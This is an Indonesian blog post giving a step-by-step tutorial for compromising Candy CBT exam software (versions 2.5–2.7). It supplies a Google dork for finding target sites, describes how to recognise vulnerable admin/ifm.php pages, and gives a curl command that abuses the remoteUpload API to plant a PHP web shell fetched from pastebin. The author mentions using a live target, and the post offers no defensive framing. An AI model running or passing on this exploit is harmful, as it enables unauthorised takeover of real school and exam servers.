CBT to RCE ( using curl )

April 26, 2020

CBT to RCE ( using curl )

[+] Materi: CBT to RCE

[+] Exploit: ifm.php

[+] Dork: intext:"responsive image" + intext:support by candy cbt"

[+] Author: Akbar / SM1L3XPLOIT

[+] Date: 26, 04, 2020

##############################################

Salin dork ke browser kesayangan kalian, kemudian pilih target. Target yg vuln adalah yg sudah kita kasih exploit maka akan meredirect ke halaman login. Tutorual ini hanya berlaku pada cbt v2.5 - v2.7

---------------------------------------------------------

Contoh sebelum diexploit:

---------------------------------------------------------

•site.com/admin/login.php

•site.com/[path]/admin/login.php

---------------------------------------------------------

Contoh sesudah diexploit:

---------------------------------------------------------

•site.com/admin/ifm.php

•site.com/[path]/admin/ifm.php

---------------------------------------------------------

Jika web yg sudah kalian exploit meredirect atau kembali ke halaman login itu vuln cbt to rce. Langsung aja kita eksekusi karena disini saya uda punya live target.

buka termux kalian, jika belum punya silahkan download terlebih dahulu di playstore atau dimanapun yg biasa kalian gunakan untuk mendownload.

jika sudah mendownload ketik command ini

-pkg install curl

tunggu sampai selesai, dan jika sudah selesai langsung aja kita cbt to rce

ketik command berikut untuk cbt to rce

-curl isitarget.com/admin/ifm.php atau isitarget.com/[path]/admin/ifm.php -d 'api=remoteUpload&dir=&filename=namashell.php&method=curl&url=isi script shell yg sudah dimasukan kepastebin'

setelah semua sudah dilakukan jika berhasil melakukan rce maka ditermux akan muncul tulisan OK.

sekian thnkz

Search This Blog

SMILEGHOST.SEC

CBT to RCE ( using curl )

Comments

Post a Comment

Popular Posts

Cara Menyimpan Video Dari Youtube, Instagram, Facebook Dll Ke Dalam Galeri